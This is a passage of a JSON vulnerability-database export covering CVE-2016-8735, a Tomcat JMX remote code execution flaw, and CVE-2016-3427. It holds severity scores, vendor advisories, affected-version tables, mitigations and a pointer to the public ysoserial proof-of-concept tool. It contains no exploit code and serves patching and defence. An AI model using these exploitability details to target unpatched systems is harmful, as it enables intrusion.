"debian", "idList": ["DEBIAN:DSA-3738-1:66970", "DEBIAN:DSA-3739-1:06429"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2016-3427"]}, {"type": "f5", "idList": ["SOL49820145", "SOL73112451"]}, {"type": "fedora", "idList": ["FEDORA:125286087B00", "FEDORA:1DA54604D2A3", "FEDORA:8CEB2616D980"]}, {"type": "freebsd", "idList": ["0B9AF110-D529-11E6-AE1B-002590263BF5"]}, {"type": "gentoo", "idList": ["GLSA-201606-18"]}, {"type": "ibm", "idList": ["1BFF63EB8AF39056E08427B06D34E43B32E43FBCC74FB2A85F32E708984FD60F", "8B5016D64A8BBF10B52DDF15458908578A8F9418D5076DA06FD0081F472F9FAA"]}, {"type": "kitploit", "idList": ["KITPLOIT:5052987141331551837", "KITPLOIT:7314019160937441300"]}, {"type": "myhack58", "idList": ["MYHACK58:62201681747"]}, {"type": "nessus", "idList": ["AIX_JAVA_APRIL2016_ADVISORY.NASL", "ALA_ALAS-2016-688.NASL", "ALA_ALAS-2016-693.NASL", "ALA_ALAS-2016-700.NASL", "ALA_ALAS-2016-776.NASL", "ALA_ALAS-2016-777.NASL", "ALA_ALAS-2016-778.NASL", "CENTOS_RHSA-2016-0650.NASL", "CENTOS_RHSA-2016-0651.NASL", "CENTOS_RHSA-2016-0675.NASL", "CENTOS_RHSA-2016-0676.NASL", "CENTOS_RHSA-2016-0723.NASL", "DEBIAN_DSA-3738.NASL", "DEBIAN_DSA-3739.NASL", "FEDORA_2016-98CCA07999.NASL", "FEDORA_2016-9C33466FBB.NASL", "FEDORA_2016-A98C560116.NASL", "FREEBSD_PKG_0B9AF110D52911E6AE1B002590263BF5.NASL", "OPENSUSE-2016-553.NASL", "OPENSUSE-2016-554.NASL", "OPENSUSE-2016-560.NASL", "OPENSUSE-2016-572.NASL", "OPENSUSE-2016-573.NASL", "ORACLELINUX_ELSA-2016-0650.NASL", "ORACLELINUX_ELSA-2016-0651.NASL", "ORACLELINUX_ELSA-2016-0675.NASL", "ORACLELINUX_ELSA-2016-0676.NASL", "ORACLELINUX_ELSA-2016-0723.NASL", "ORACLE_JROCKIT_CPU_APR_2016.NASL", "REDHAT-RHSA-2016-0650.NASL", "REDHAT-RHSA-2016-0651.NASL", "REDHAT-RHSA-2016-0675.NASL", "REDHAT-RHSA-2016-0676.NASL", "REDHAT-RHSA-2016-0677.NASL", "REDHAT-RHSA-2016-0678.NASL", "REDHAT-RHSA-2016-0679.NASL", "REDHAT-RHSA-2016-0701.NASL", "REDHAT-RHSA-2016-0702.NASL", "REDHAT-RHSA-2016-0708.NASL", "REDHAT-RHSA-2016-0716.NASL", "REDHAT-RHSA-2016-0723.NASL", "REDHAT-RHSA-2016-1039.NASL", "SL_20160420_JAVA_1_8_0_OPENJDK_ON_SL6_X.NASL", "SL_20160420_JAVA_1_8_0_OPENJDK_ON_SL7_X.NASL", "SL_20160421_JAVA_1_7_0_OPENJDK_ON_SL5_X.NASL", "SL_20160421_JAVA_1_7_0_OPENJDK_ON_SL6_X.NASL", "SL_20160509_JAVA_1_6_0_OPENJDK_ON_SL5_X.NASL", "SUSE_SU-2016-1248-1.NASL", "SUSE_SU-2016-1250-1.NASL", "UBUNTU_USN-2963-1.NASL", "UBUNTU_USN-2964-1.NASL", "UBUNTU_USN-2972-1.NASL", "VMWARE_VCENTER_VMSA-2016-0005.NASL", "VMWARE_VCLOUD_DIRECTOR_VMSA-2016-0005.NASL", "VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA_2016_0005.NASL", "VMWARE_VSPHERE_REPLICATION_VMSA_2016_0005.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310872149", "OPENVAS:1361412562310872150", "OPENVAS:1361412562310872157", "OPENVAS:703738", "OPENVAS:703739"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2018"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-0650", "ELSA-2016-0651", "ELSA-2016-0675", "ELSA-2016-0676", "ELSA-2016-0723"]}, {"type": "pentestit", "idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B"]}, {"type": "redhat", "idList": ["RHSA-2016:0678"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-8735"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:1222-1", "OPENSUSE-SU-2016:1230-1", "OPENSUSE-SU-2016:1235-1", "OPENSUSE-SU-2016:1262-1", "OPENSUSE-SU-2016:1265-1", "SUSE-SU-2016:1248-1", "SUSE-SU-2016:1250-1", "SUSE-SU-2016:1458-1", "SUSE-SU-2016:1475-1"]}, {"type": "tomcat", "idList": ["TOMCAT:7FF5C8CC86A7AF5DA33F4B5874774B9B"]}, {"type": "ubuntu", "idList": ["USN-2972-1"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2016-3427", "epss": "0.046410000", "percentile": "0.913090000", "modified": "2023-03-14"}, {"cve": "CVE-2016-8735", "epss": "0.041200000", "percentile": "0.908160000", "modified": "2023-03-14"}], "vulnersScore": 9.7}, "_state": {"dependencies": 1701031813, "score": 1701032287, "epss": 0}, "_internal": {"score_hash": "e1b6887ae4d897f77d58f7f6365d3181"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92553", "sourceData": "\n poc \u4ee3\u7801\u53c2\u89c1\uff1ahttps://github.com/frohoff/ysoserial\n ", "status": "cve,poc,details", "category": "", "has_poc": true}

{"prion": [{"lastseen": "2023-11-22T03:41:16", "description": "Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach JMX ports. The issue exists because this listener wasn't updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 5.9}, "published": "2017-04-06T21:59:00", "type": "prion", "title": "Remote code execution", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-8735"], "modified": "2023-11-07T02:36:00", "id": "PRION:CVE-2016-8735", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2016-8735", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T03:31:38", "description": "Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77; Java SE Embedded 8u77; and JRockit R28.3.9 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to JMX.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 6.0}, "published": "2016-04-21T11:00:00", "type": "prion", "title": "Buffer overflow", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2023-11-07T02:32:00", "id": "PRION:CVE-2016-3427", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2016-3427", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2023-12-07T22:27:24", "description": "Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach JMX ports. The issue exists because this listener wasn't updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-06T21:59:00", "type": "debiancve", "title": "CVE-2016-8735", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-8735"], "modified": "2017-04-06T21:59:00", "id": "DEBIANCVE:CVE-2016-8735", "href": "https://security-tracker.debian.org/tracker/CVE-2016-8735", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-06T18:25:28", "description": "Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77; Java SE Embedded 8u77; and JRockit R28.3.9 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to JMX.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2016-04-21T11:00:00", "type": "debiancve", "title": "CVE-2016-3427", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2016-04-21T11:00:00", "id": "DEBIANCVE:CVE-2016-3427", "href": "https://security-tracker.debian.org/tracker/CVE-2016-3427", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-10-25T18:06:08", "description": "Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach JMX ports. The issue exists because this listener wasn\u2019t updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-06T00:00:00", "type": "attackerkb", "title": "CVE-2016-8735", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-8735"], "modified": "2023-10-05T00:00:00", "id": "AKB:D91AE5D0-67DF-4E98-925D-B730FC5F2045", "href": "https://attackerkb.com/topics/Q1ZmV2ey2C/cve-2016-8735", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-25T18:06:10", "description": "Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77; Java SE Embedded 8u77; and JRockit R28.3.9 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to JMX.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2016-04-21T00:00:00", "type": "attackerkb", "title": "CVE-2016-3427", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2023-10-05T00:00:00", "id": "AKB:C3CF0D9C-F7A6-43C6-802E-F6894C586B9A", "href": "https://attackerkb.com/topics/fZDiTmu5An/cve-2016-3427", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2022-03-12T12:01:08", "description": "The JmxRemoteLifecycleListener was not updated to take account of Oracle's fix for CVE-2016-3427. JMXRemoteLifecycleListener is only included in EWS 2.x and JWS 3.x source distributions. If you deploy a Tomcat instance built from source, using the EWS 2.x, or JWS 3.x distributions, an attacker could use this flaw to launch a remote code execution attack on your deployed instance.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-01-03T18:49:05", "type": "redhatcve", "title": "CVE-2016-8735", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-8735"], "modified": "2022-03-12T09:44:30", "id": "RH:CVE-2016-8735", "href": "https://access.redhat.com/security/cve/cve-2016-8735", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-12-07T21:42:37", "description": "Apache Tomcat contains an unspecified vulnerability that allows for remote code execution if JmxRemoteLifecycleListener is used and an attacker can reach Java Management Extension (JMX) ports. This CVE exists because this listener wasn't updated for consistency with the Oracle patched issues for CVE-2016-3427 which affected credential types.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-12T00:00:00", "type": "cisa_kev", "title": "Apache Tomcat Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-8735"], "modified": "2023-05-12T00:00:00", "id": "CISA-KEV-CVE-2016-8735", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-06T16:20:37", "description": "Oracle Java SE and JRockit contains an unspecified vulnerability that allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Java Management Extensions (JMX). This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-05-12T00:00:00", "type": "cisa_kev", "title": "Oracle Java SE and JRockit Unspecified Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2023-05-12T00:00:00", "id": "CISA-KEV-CVE-2016-3427", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2019-04-30T18:21:00", "description": "\nF5 Product Development has assigned ID 466436 (ARX) and INSTALLER-2832 (Traffix SDC) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.1| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.1 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| 6.2.0 - 6.4.0| None| Medium| Apache Tomcat \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| None| Medium| Apache Tomcat\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you can limit access to the ARX GUI and Traffix SDC Management Console to only use secure networks.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2016-12-02T01:34:00", "type": "f5", "title": "Apache Tomcat vulnerability CVE-2016-8735", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-8735"], "modified": "2017-04-27T19:14:00", "id": "F5:K49820145", "href": "https://support.f5.com/csp/article/K49820145", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:45:15", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you can limit access to the ARX GUI and Traffix SDC Management Console to only use secure networks.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-01T00:00:00", "type": "f5", "title": "SOL49820145 - Apache Tomcat vulnerability CVE-2016-8735", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-8735"], "modified": "2016-12-01T00:00:00", "id": "SOL49820145", "href": "http://support.f5.com/kb/en-us/solutions/public/k/49/sol49820145.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-06-08T00:16:08", "description": "\nF5 Product Development has assigned ID 591358 (BIG-IP), ID 594415 (BIG-IQ), ID 594418 (Enterprise Manager), ID 552323 (ARX), and INSTALLER-2440 (Traffix SDC) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth>) may list Heuristic H595913-1 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 12.1.2| Medium| Tomcat, Configuration utility \nBIG-IP AAM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| 12.1.2| Medium| Tomcat, Configuration utility \nBIG-IP AFM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| 12.1.2| Medium| Tomcat, Configuration utility \nBIG-IP Analytics| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1| 12.1.2| Medium| Tomcat, Configuration utility \nBIG-IP APM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 12.1.2| Medium| Tomcat, Configuration utility \nBIG-IP ASM| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| 12.1.2| Medium| Tomcat, Configuration utility \nBIG-IP DNS| 12.0.0 - 12.1.1| 